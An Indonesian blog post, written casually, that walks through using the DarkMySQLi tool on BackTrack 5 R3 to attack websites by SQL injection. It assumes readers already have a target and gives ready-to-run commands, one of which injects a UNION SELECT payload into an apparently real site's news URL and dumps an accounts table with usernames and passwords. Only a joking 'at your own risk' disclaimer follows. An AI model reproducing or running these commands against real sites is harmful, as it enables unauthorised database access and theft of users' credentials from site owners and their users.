Berhubung tadi malem ane ktiduran nungguin upgrade, jadi g jadi buat tutorial fasttracknya, pagi ini mau ane ganti aje Tutorialnya jadi tutorial Darkmysqli. tetap menggunakan backtrack 5 R3,
Akses DarkmySqli : Application => Backtrack => Exploitation Tools => Web Exploitation Tools => DarkMySQLi
Berhubung masih pagi, ane masih rada males, jadi ane asumsiin kawan2 udah pada punya target.
Langkah pertama kita perlu mecari lokasi celah columns untuk darksqlinya, dengan memasukkan comend :
python DarkMySQLi.py -u www.victim.com --findcol
tunggu hingga proses selesai
pada contoh pertama jumlah column tidak bisa ditemukan, maka jadinya kayak gini :
Pada target kedua, column bisa ditemukan :
Bedanya dimana ? liat log paling bawah, ane nggak ngarti bahasa buat neranginnya gimana.. ahhaha..
Oke, sekarang kita sudah menemukan columsnya, langkah selanjutnya kita scan secara menyeluruh untuk menemukan database name, tablle, jumlah baris dan columns , versy MySQL dll. gunakan comend dibawah ini :
python DarkMySQLi.py -u http://www.brads.org.uk/news.php?id=87+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,5-- -D scanme -T accounts -C Id,uname,passwd,fname,lname --dump
lihat apa yang kawan2 temukan ... :D
jangan disalah gunakan, resiko di tanggung penumpang...


Tidak ada komentar